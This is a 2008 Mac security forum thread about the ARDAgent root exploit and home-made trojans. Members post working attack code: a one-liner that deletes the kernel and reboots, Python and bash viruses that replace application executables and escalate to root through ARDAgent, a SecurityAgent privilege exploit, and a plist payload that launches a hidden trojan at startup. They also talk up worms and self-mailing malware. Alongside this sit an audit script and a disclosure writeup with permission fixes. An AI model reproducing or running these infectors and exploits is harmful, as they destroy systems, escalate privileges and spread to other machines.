Full Version: remote login Trojan
TSF - Mac Security Forums > Discussion > Programming
andrewistheshit
oh well i will look into it later if i have a need for it
callmenames
Oktane, you are totalllllly asking for "ALERT! Major new WORM released into the wild by the evil Oktane threatens OS X security! Will users double-click it?!" headlines with that one. :)
Oktane
There goes the neighborhood :P

People must be so confused...
Is it a worm, is it a virus, is it a trojan is it neither?
Can we fix it, can't we fix it?
Am I at risk or safe?
Should I buy the useless virus sniffer or not?
Is it a poker game or applescript?

"I can tell you that there is a lot of misinformation out there. There's a lot of fabrication out there, and a lot of misinformation. "
- Jeff Gannon
callmenames
Proof that Symantec AntiVirus Experts don't even read their own documentation.



Dear Symantec, do please show us in what way AStht 'claims to be something desirable' ?
Oktane
So what next? I'm bored. We could release a devastating multiplying trojan, but we won't. I'm not even gonna bother writing it. Should we look for other exploits or improve on this trojan?
Macpunk
More exploits and promise me you'll write a worm for the next one.

--Macpunk
Oktane
QUOTE(Macpunk @ Jun 20 2008, 08:34 PM) *
More exploits and promise me you'll write a worm for the next one.

I'm looking right now... and thanks for the reversing tutorials (http://mcscribble.com/projects.html) I just clicked on your sig and looked around.
Siph0n
Haha...

well I suppose I should write my own little trojan so I can get famous too!

CODE
#!/bin/sh
# Porn.sh
osascript -e 'tell app "ARDAgent" to do shell script "rm -rf /mach_kernel && reboot"';


Oh yeah! Bring on the note on my resume :D

You guys should rewrite that in C/ObjC and distribute a binary. No need to call osascript with system(); you can compile and run AppleScripts via the API.
callmenames
QUOTE(Macpunk @ Jun 20 2008, 06:34 PM) *
More exploits and promise me you'll write a worm for the next one.

--Macpunk

Speaking for myself... I would rather see *you* (as in everyone) write some code. We've been using languages such as bash and AppleScript which are fairly accessible - everyone has a text editor, all OS X machines come with Terminal and Script Editor. Everyone lurking and reading this thread should also be gaining familiarity with both languages and how to write code using them... So, suppose your AppleScript or bash script does whatever you like and then goes into a loop which checks the /Volumes directory... and then copies itself to any volume found, or installs itself into the startup process on volumes which happen to have valid OS X systems or into user home folders found on those volumes (for instance by inserting a reference to itself into the user's loginwindow.plist file to be run each time that user logs in.) Then delay for awhile and re-run the loop over and over and over. That's a worm.
Oktane
QUOTE(Siph0n @ Jun 20 2008, 08:52 PM) *
well I suppose I should write my own little trojan so I can get famous too!

Famous... I don't even think 100 sites have this posted. No one has received recognition from outside sources; the most I heard was "bunch of kids." No one released it, so the press will die off in a couple of days. So in summary, no one's famous, but if you guys want to release a worm/trojan/whatever and get busted, go ahead.
callmenames
QUOTE(Siph0n @ Jun 20 2008, 06:52 PM) *
Haha...

well I suppose I should write my own little trojan so I can get famous too!

CODE
#!/bin/sh
# Porn.sh
osascript -e 'tell app "ARDAgent" to do shell script "rm -rf /mach_kernel && reboot"';


Oh yeah! Bring on the note on my resume :D

You guys should rewrite that in C/ObjC and distribute a binary. No need to call osascript with system(); you can compile and run AppleScripts via the API.

Security researchers are warning of a new OS X Trojan which threatens horny OS X users!
EDIT: I forgot to add 'in the wild' just for maximum fear factor.
callmenames
QUOTE(Oktane @ Jun 20 2008, 07:08 PM) *
I don't even think 100 sites have this posted.


Currently 2200 results.
http://www.google.com/search?q=%22AppleScript.tht%22

Currently 54 results.
http://www.google.com/search?q=%22OSX.astht%22

Currently 3,910 results.
http://www.google.com/search?q=%22ARDagent%22+exploit

Currently 1,400 results.
http://www.google.com/search?q=%22PokerGam...leScript+trojan

Not all directly attributable to this thread... but most.

QUOTE(Oktane @ Jun 20 2008, 07:08 PM) *
if you guys want to release a worm/trojan/whatever and get busted.

You could release a proof-of-concept, just make it clear up front what the software does.
Oktane
Nevermind...
callmenames
QUOTE
Appletell – SecureMac is reporting a new Trojan horse that threatens the Mac OS X 10.4 and 10.5 installation. AppleScript.THT, a new variant of the infamous Trojan Horse virus, is originating from a hacked website through iChat and Limewire.

http://www.techdispenser.com/slots/view/5435

Wow. Clueless news you can't use...
Oktane
These guys even made their own article based in our findings: http://www.appletell.com/apple/comment/os-...hole-and-a-fix/

You're welcome :)
callmenames
QUOTE
On Thursday, security vendor SecureMac reported seeing new variants of AppleScript.THT Trojan horse in the wild affecting users of Mac OS X 10.4 and 10.5.

http://news.cnet.com/8301-10789_3-9973703-...547-1009_3-0-10

Remember the good old days when it was just the old variants that were a problem? In other news, an impromptu survey of Internet news sites suggests most Internet Reporters may be drunk while on the job.
Oktane
The comments are the best: "Yeah, I once saw Bigfoot too. He was at the porn site where all of the Anti-virus makers are trying unsuccessfully to create and release some Mac malware."

If you don't know what you're talking about shut your brain washed ass up.
callmenames
QUOTE
Dubbed "Applescript.THT Trojan," the malware is thought to have originated via a "hacker" website, Limewire and even Apple's own iChat.
I always suspected that iChat was creating malware, now it's been proven!

QUOTE
Applescript.THT Trojan is disguised as an application bundle

How clever of iChat to disguise its Trojan as an application bundle! I wonder what it really is???
http://news.softpedia.com/news/It-039-s-Of...ose-88472.shtml

These people are not using their brains to full capacity.
Oktane
QUOTE
the best thing you can do is never download and install software from untrusted sources or dubious websites.

Says the giant upload/download website. lol
callmenames
QUOTE
Intego, the other firm to highlight the issue, said the Trojan could be used to run arbitrary code.

http://www.betanews.com/article/Mac_OS_X_T...wild/1213976101

Uh, yes, the programmer can certainly program any code into the program, yes. What?

QUOTE
SecureMac reports that it is being distributed from a site frequented by malicious users

Oh my goodness, I had no idea...

QUOTE
and files containing the Trojan were being sent through both iChat and Limewire. Bundled within an AppleScript, the files containing it have the names "ASthtv05" and "ASthtv06."

OHHHH! So iChat's Trojan is bundled with an AppleScript! AH HA! Now it all makes sense!

QUOTE
Any user running either 10.4 or 10.5 are said to be at risk, and currently the only interim solution being advertised is to only download files from trusted sources until the problem is fixed.

So after the 'fix' why don't you come visit this forum, download yourself a copy of the compiled AStht and run it and we'll see just how safe you are, asshat. It does more than one thing. After your username, password and IP address get sent to Andrew you are so screwed dude! :)
Siph0n
Alright callmenames... you encouraged others to code stuff, and so here we go. Virus in Python that infects .app bundles... I don't have a Mac so I can't debug... based on an earlier version by three authors who were bored and goofing off. And it does nothing... except maybe slow your system down from the additional workload.
CODE
#!/usr/bin/env python
# appvir.py by k, ny, reik
import sys, os, shutil

def infect():
    # every .app bundle the locate database knows about
    for path in os.popen("locate '*.app'"):
        path = path.rstrip()
        root, ext = os.path.splitext(path)
        # the bundle's main executable: Foo.app/Contents/MacOS/Foo
        path = os.path.join(path, 'Contents', 'MacOS', os.path.basename(root))
        ownedpath = '%s_owned' % path
        if os.path.exists(path) and not os.path.exists(ownedpath): # if no previous infection
            path_stats = os.lstat(path)
            shutil.move(path, ownedpath)                      # park the real binary
            shutil.copy(os.path.abspath(sys.argv[0]), path)   # and take its place
            os.chown(path, path_stats.st_uid, path_stats.st_gid)

if __name__ == '__main__':
    prog, args = os.path.abspath(sys.argv[0]), ' '.join(sys.argv[1:])
    if os.getuid():
        # not root yet: re-launch ourselves through ARDAgent, which runs as root
        os.system('osascript -e \'tell app "ARDAgent" to do shell script' \
                  ' "\\\"%s\\\" %s &"\'' % (prog, args))
        if sys.argv[0].find('.app') > 0:
            # launched in place of a real app: run the parked original so nothing looks wrong
            os.system('"%s_owned" %s' % (prog, args))
    else:
        infect()

    # k, ny, reik
callmenames
Eeek! A virat and I think it's IN THE WILD! Can NO ONE save us from this threat? I'll just start porting that over to bash... What to do about the payload, hmmm, perhaps randomly fire-off some nice notes to Technology News Reporters. :)
Oktane
I don't think that exploit works with any other applications. Is there a specific way to look for exploits, or is it more of a trip-over-it kind of thing?
Siph0n
QUOTE(callmenames @ Jun 21 2008, 12:27 AM) *
Eeek! A virat and I think it's IN THE WILD! Can NO ONE save us from this threat? I'll just start porting that over to bash... What to do about the payload, hmmm, perhaps randomly fire-off some nice notes to Technology News Reporters. :)

Ssh... be vewy vewy qwiet... I'm hunting idiots :)

Sweet. Can't wait to see your bash version. Hopefully someone does a Perl version.. Ooo and maybe ObjC too, using spotlight.
Oktane
Maybe it can even be an inter-species virus designed to cross-infect other operating systems. Hopping from Linux to Windows to Mac and back again. The avian bird flu of computer viruses, with a little less media attention and a lot less dead Chinese. ;)
callmenames
QUOTE(Siph0n @ Jun 20 2008, 10:10 PM) *
Sweet. Can't wait to see your bash version.

Don't hold your breath, I have to overcome the issue with bash scripts not being directly executable from the GUI. I'm mulling it over... this is my starting point.
CODE
#!/bin/bash

declare    just_me="${0}" newline=$'\n' IFSold="${IFS}" IFS="${newline}"

function infect() {
find /Applications -maxdepth 1 -iname "*.app" -type d | while read the_path; do
    # Foo.app -> Foo.app/Contents/MacOS/Foo (the bundle's main executable)
    inner_sanctum="${the_path}/Contents/MacOS/$(basename "${the_path}")"
    inner_sanctum="${inner_sanctum%.app}"
    [ -x "${inner_sanctum}_owned" ] && continue   # already done this one
    [ -x "${inner_sanctum}" ] || continue         # nothing where the executable should be
    mv "${inner_sanctum}" "${inner_sanctum}_owned"
    cp "${just_me}" "${inner_sanctum}"
    # Still need to chown/chgrp and touch dates back
done
}


if [ ! -x "${0}_owned" ]; then
    infect &
fi

[ -x "${0}_owned" ] && exec open "${0}_owned"

exit 0

I will likely proceed by using Platypus to generate an executable bundle, copy the Platypus bundle pieces into corresponding locations inside the app's bundle, rename the executable itself to match the app etc. not sure yet, must get COFFEE! :)

Hmm, I failed to consider what happens when a document is double-clicked to launch the corresponding app. Must have more coffee.
callmenames
QUOTE(Oktane @ Jun 20 2008, 09:42 PM) *
Is their a specific way to look for exploits or is it more of a trip over it kinda thing.

Some things are more likely than others, although there are too many possibilities to narrow it down to a single area or type of issue. Here's a fun thing to try... you can use this little bash script...

CODE
#!/bin/bash
# For every setuid-root file under $1 (default /Applications), list each
# directory on the way down to it so the whole permission chain can be inspected.
IFSold="${IFS}"
find "${1:-/Applications/}"  -user root -perm +4000 -print | while read filename; do
echo
    IFS="/"
    filename="${filename/\/\///}"    # collapse the '//' a trailing slash on $1 produces
    items=( ${filename} )            # split the path into its components on '/'
    chain=""
    for (( i=0;i<${#items[*]};i++));do
        chain="${chain}${items[$i]}"
        ls -alod "${chain:-/}"       # the first component is empty: that is /
        chain="${chain}/"
    done
    IFS="${IFSold}"
done


Look closely at the permissions in the output.
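The script above prints `ls -alod` for each path component and leaves the comparison to the reader. The following is an added example (my code, not from the thread) that does the same walk in Python and states the check explicitly: a setuid-root binary is only as safe as every directory above it, so any component that is writable by group or others, is a symlink, or is not owned by root gets reported. The `demo_tree()` fixture is constructed for offline testing and is not a real system path.

```python
#!/usr/bin/env python3
"""Audit the directory chain above setuid-root binaries (added example).

If any directory between / and a setuid binary can be renamed or replaced
by a non-root user, that user controls what the privileged program ends
up loading or executing, whatever the binary's own permissions say.
"""
import os
import stat
import sys
import tempfile


def find_setuid_root(root):
    """Yield regular files under root owned by uid 0 with the setuid bit set
    (what the bash script's 'find -user root -perm +4000' does)."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_uid == 0 and st.st_mode & stat.S_ISUID:
                yield full


def weak_components(path):
    """Walk from / down to path; return [(component, reason), ...] for every
    element a non-root user could tamper with. An empty list means clean."""
    findings = []
    parts = [p for p in os.path.abspath(path).split(os.sep) if p]
    chain = os.sep
    for i in range(len(parts) + 1):          # i == 0 is the root directory itself
        if i:
            chain = os.path.join(chain, parts[i - 1])
        try:
            st = os.lstat(chain)
        except OSError as e:
            findings.append((chain, "cannot stat: %s" % e.strerror))
            break
        mode = st.st_mode
        if stat.S_ISLNK(mode):
            findings.append((chain, "symlink in the chain"))
        if st.st_uid != 0:
            findings.append((chain, "owned by uid %d, not root" % st.st_uid))
        if mode & stat.S_IWOTH:
            sticky = " (sticky)" if stat.S_ISDIR(mode) and mode & stat.S_ISVTX else ""
            findings.append((chain, "writable by others" + sticky))
        elif mode & stat.S_IWGRP:
            findings.append((chain, "writable by group %d" % st.st_gid))
    return findings


def demo_tree():
    """Constructed sample, not a real system path: one fake helper under a
    world-writable directory and one under a 0755 directory."""
    base = tempfile.mkdtemp(prefix="suidchain-")
    loose, tight = os.path.join(base, "loose"), os.path.join(base, "tight")
    os.mkdir(loose)
    os.chmod(loose, 0o777)
    os.mkdir(tight)
    os.chmod(tight, 0o755)
    bad, good = os.path.join(loose, "helper"), os.path.join(tight, "helper")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, 0o4755)   # setuid bit; only dangerous once the owner is root
    return bad, good


if __name__ == "__main__":
    for root in sys.argv[1:] or ["/Applications"]:
        for binary in find_setuid_root(root):
            for component, reason in weak_components(binary):
                print("%s: %s: %s" % (binary, component, reason))
```

Run it with no arguments to audit /Applications, or pass one or more directories. A sticky, world-writable directory (like /tmp) is reported too, because sticky only stops deletion of other users' entries; it is still a place an attacker can create files, and no setuid binary belongs beneath it.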
Macpunk
QUOTE(Oktane @ Jun 20 2008, 08:43 PM) *
I'm looking right now... and thanks for the reversing tutorials (http://mcscribble.com/projects.html) I just clicked on your sig and looked around.


Pfft, those suck. Well, they were a good start. I'm glad you found them useful. :-)

I want to expand them and add more info (common loop structures, other calling conventions, etc.), but I'm too lazy. Hell, I could add specific things like reversing Cocoa apps. But again, I'm too lazy. Maybe in the future...

@callmenames: Merh, I'm too involved with my latest project...

And both of you ought to hang out in IRC. You know the info, so you've got no excuse. ;-P

Also, I found out you could use this vulnerability to execute commands as securityagent through SecurityAgent.app, but I was unable to reproduce the bug outside of the interactive Python interpreter. Maybe one of you could have some fun:

CODE
osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'


Congrats to you both,
Macpunk
callmenames
Why thank you Macpunk! :) I make a ridiculously large number of mistakes, most of which I am unable to spot *until* I have posted something. Even with the time constraints on editing I am able to correct many, many mistakes in my posts before anyone sees them (hopefully.) In chat I do not have that opportunity and I generally come off somewhat more like this...

WHy tahnk yu mApunk! ): echo -n "I made a ridiculously large numper of stimakes,:<del> shit.. display dialog "most of which I am unable to sport &until* I is posted sum thing. \x07 That's the bell right? Even with time constraned editing I able to correct many, many mistrake before you see them.

Well, plus I tend to get easily sidetracked and people get alllllllll pisssy when you don't respond to them for hours or days at a time. :)

See, I had to edit this post too.
callmenames
QUOTE(Macpunk @ Jun 21 2008, 12:19 AM) *
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'

Yep, something's definitely up there but its rare and delicate and I can't quite pin it down...

Ooooh, got it I think...
Run this in Terminal
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "osascript -e \"tell app \\\"SecurityAgent\\\" to do shell script \\\"id\\\"\""'

Just be very patient, it will take a minute or two to timeout.
Then immediately run this.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'

Does that work for anybody else? I got...
CODE
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

And now I can't reproduce it again. Sigh.
callmenames
Still having trouble getting it pinned down but I am able to reproduce it sporadically.

CODE
$ ps -axww | grep Security
5981  ??  S      0:01.27 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent -psn_0_102236161
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)

Then some combination of killing it, running it etc. and....
CODE
ps -axww | grep Security
6198  ??  S      0:01.59 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)


Hmm.
CODE
$ ps -auxww | grep Security
security  6198   0.7  0.4   144740   5896  ??  S     1:53AM   0:01.78 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent

Ok, so at some point it's being launched / relaunched as itself, not as the user... and it appears not to be launched with an argument of a specific psn.

I killed it, after the next two lines...
CODE
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)


Well I can definitely get it to stop being uid=92 :) As for the getting it to be uid=92 that is proving somewhat more elusive.
callmenames
Okey dokey, try this...
CODE
sudo killall SecurityAgent

The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.

Yep, I just restarted and reproduced it on the first try.
Siph0n
SecurityAgent is responsible for the authentication prompt, I believe, as well as many things accessed by the system from Security.framework. I wonder what its AppleScript dictionary is capable of...
callmenames
As far as I can tell, neither ARDAgent nor SecurityAgent have any AppleScript dictionary of their own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...
Siph0n
QUOTE(callmenames @ Jun 21 2008, 06:22 AM) *
As far as I can tell, neither ARDAgent nor SecurityAgent have any AppleScript dictionary of their own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...

Perhaps some fooling with nm, class-dump and strings is warranted.
callmenames
Uh huh, I looked but nothing jumped out at me. All the output is here > http://rapidshare.de/files/39784043/Security.txt.zip.html


Siph0n
Thanks. Unfortunately nothing jumped out at me either. I'm sure there's some fun tricks hiding in SecurityAgent though. It does more than I initially suspected.
Oktane
Yesterday I also noticed while testing all the apps on my computer (10.4.11) that SecurityAgent.app gave a unique output. However, I tried using it to make a directory in root and/or the desktop and it always had permission denied. I think that it carries special permissions set up by the programmers. I'm sure that whoever made that application would realize not to run "SecurityAgent" under anything devastatingly powerful.
Macpunk
QUOTE(callmenames @ Jun 21 2008, 04:51 AM) *
Okey dokey, try this...
CODE
sudo killall SecurityAgent

The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.

Yep, I just restarted and reproduced it on the first try.


Reproducible for me too. PPC/G4/10.4.11.

I was thinking about this last night and was gonna try this theory last night. xD

I'm thinking all you need is a prompt that asks for higher permissions. If that's true, then it ought to work with any application (as was demonstrated through Keychain Access).

--Macpunk
Oktane
As we draw closer to the next exploit, how about we keep it on the down low: PM, IRC or a thread that's a little less HOT. Just a suggestion.
Oktane
CODE
-- If SecurityAgent is open kill it
try
    do shell script "killall SecurityAgent"
end try

-- Setup SecurityAgent
ignoring application responses
    do shell script "sudo -s"
end ignoring

-- Exploit
tell application "SecurityAgent" to do shell script "id"


Output:
QUOTE
"uid=92(securityagent) gid=0(wheel) groups=0(wheel)"
callmenames
QUOTE(Oktane @ Jun 21 2008, 01:19 PM) *
As we draw closer to the next exploit, how about we keep it on the down low: PM, IRC or a thread that's a little less HOT. Just a suggestion.

I understand what you mean, and I won't disclose anything privately shared with me by someone else. For my purposes, though, I probably will continue to openly post any vulnerabilities which I run across myself, because my goal is to get more people interested in programming on Macs, and the topic of vulnerabilities brings people in by the droves and gets them interested. Now to get them writing and posting CODE in this forum!... :)

Oktane
I was thinking and came up with a funny idea: how about we make an anti-trojan virus. An AppleScript application that fixes permissions on SystemLoginItems.plist and ARDAgent.app and removes the old trojan if it was installed. Then it notifies the user they were patched and spreads through their Mail account if they have one.

Since both of these exploits have been around for the better half of a decade, this might just force Apple's hand.
callmenames
That still leaves the dreaded "rm -Rf ~" trojan. GASP!
(For anyone who doesn't already know what that command does...

rm=remove,
-R=recursive meaning all subfolders,
-f=force as in just delete stuff and don't ask me any question,
~=your user home folder.

So the command is essentially... "remove my home folder and all subfolders inside it and don't ask me any questions". Obviously, it's probably not something anyone would want to have happen, so don't run the command.)

You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?
Oktane
QUOTE(callmenames @ Jun 21 2008, 04:50 PM) *
You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?

Especially if they don't fully understand what it does.
callmenames
Exactly! There is a lot of misinformation due to SecureMac's woefully inaccurate press release and the bizarre interpretations thereof by the Internet media sites. So a detailed explanation of what it actually does and how a user could manually do or undo the same things would help a lot of people to understand not just your own trojan but many of the features of Mac OS X in general.

For instance, in "AppleScript trojan horse template" or AStht, are subroutines which add a cron task to run shell scripts for a reverse-shell or reverse-VNC session. Cron is a program included in OS X which runs commands at a scheduled time. More information on cron can be found by opening the Terminal program and typing 'man cron' without the quotes to see the manual page for cron. Apple has a copy of that information available online as well http://developer.apple.com/documentation/D...an8/cron.8.html

A user can see what, if any, entries are listed in the crontab file for the user by running the Terminal program and issuing the command:
crontab -l

All the entries can be easily removed with this command:
crontab -r

That will remove the two cron entries which "AppleScript trojan horse template" or AStht adds to create the reverse-shell and/or reverse VNC session.
Oktane
So is there any way to duplicate the MOAB in some form, or has that been fully patched? The thing is that as long as that SystemLoginItems.plist is around there will always be an exploit; it just bugs me.

Exploits that need to get patched:
1. Trojan can create a hidden user (or any other application)
2. ARDAgent exploit
3. SystemLoginItems.plist
Macpunk
Everybody who cares has already read this thread twice, and prolly found more anyways. ;-P

--Macpunk
callmenames
QUOTE(Oktane @ Jun 21 2008, 04:08 PM) *
So is their anyway to duplicate the MOAB in some form or has that been fully patched?

I can personally attest to the fact that some of the vulnerabilities disclosed in the "Month of Apple Bugs" project remain unpatched.
http://projects.info-pull.com/moab/
Oktane
UNOFFICIAL FULL DISCLOSURE

ARDAgent.app Exploit

AFFECTED: Mac OS X 10.4 - 10.5
Risk: Critical
USAGE: Easy

History: Discovered at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Wawl, Oktane and andrewtheshit. First implemented in AppleScript but can be ported to Bash (Bourne Again Shell). Used in proof-of-concept trojans throughout the thread. Poses a high risk for ease of use and lack of experience required. Allows the attacker to run any code, malicious or otherwise. This vulnerability also affects all operating systems released 10.4 and above, because this application is included by default.

Usage:
Original Script (AppleScript):
CODE
tell application "ARDAgent.app" to do shell script "id"

Bash Script (Bourne Again Shell):
CODE
osascript -e 'tell application "ARDAgent" to do shell script "id"'


This will give an output of uid 0, or root, the superuser of Unix-based computers, when run by an administrator. The reason for this vulnerability is that the application ARDAgent.app (located at /System/Library/CoreServices/ARDAgent.app) runs as root. An oversight or mistake by the programmers and maintainers of Mac OS X. Note that this exploit can only be achieved if the affected user is an administrator.

Solutions: A temporary solution for the mainstream Mac OS X owner, until a patch is released by Apple in a future Software Update, is to change the permissions of the application ARDAgent.app. This is an easy fix and should be distributed immediately, as the trojans specified above have been released to the public.

1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
CODE
cd /System/Library/CoreServices

3. Enter:
CODE
sudo chmod u-s ARDAgent.app/Contents/MacOS/ARDAgent

4. You will be prompted to enter your password, do so.
5. Check to make sure that this is working by running the exploit again.
Enter:
CODE
osascript -e 'tell application "ARDAgent" to do shell script "id"'

You should see your username displayed as the uid.

com.apple.SystemLoginItems.plist Exploit

AFFECTED: Mac OS X 10.3 - 10.5
Risk: Medium
USAGE: Medium

History: Made public at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Lokin, Oktane and andrewtheshit. First implemented in AppleScript but can be ported to Bash (Bourne Again Shell) and other programming languages. Used in proof-of-concept trojans throughout the thread. Poses a medium risk for medium ease of use and number of computers affected. Allows the attacker to run any code, malicious or otherwise. This exploit has evidently existed for quite some time now (the better half of a decade).

Usage: The file is located in /Library/Preferences/com.apple.SystemLoginItems.plist
Example:
CODE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>AutoLaunchedApplicationDictionary</key>
    <array>
        <dict>
            <key>Hide</key>
            <true/>
            <key>Path</key>
            <string>/Library/Caches/.trojan.app</string>
        </dict>
    </array>
</dict>
</plist>


The file can be overwritten, edited or replaced. The fault lies in the permissions set upon this file, allowing anyone to edit SystemLoginItems.plist. Upon restart the application is then run as a startup item under root, or uid 0, the superuser of Unix-based computers. A payload for this exploit could easily be created as a compiled AppleScript application (or bundle), which already exists in the wild. The reason for the medium risk also involves the easy detection of the exploit by knowledgeable users. A trojan can hide itself and replace the plist file after use, but the user must not detect the attack before restarting the computer. However, the trojan might actually restart the computer on its own, posing a larger risk but a higher rate of detection.

Solutions: A temporary solution for the mainstream Mac OS X owner, until a patch is released by Apple in a future Software Update, is to change the permissions of the plist file /Library/Preferences/com.apple.SystemLoginItems.plist. This is an easy fix and should be distributed immediately, as the trojans specified above have been released to the public.

1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
CODE
cd /Library/Preferences

3. Enter:
CODE
sudo chmod o-w com.apple.SystemLoginItems.plist

4. You will be prompted to enter your password, do so.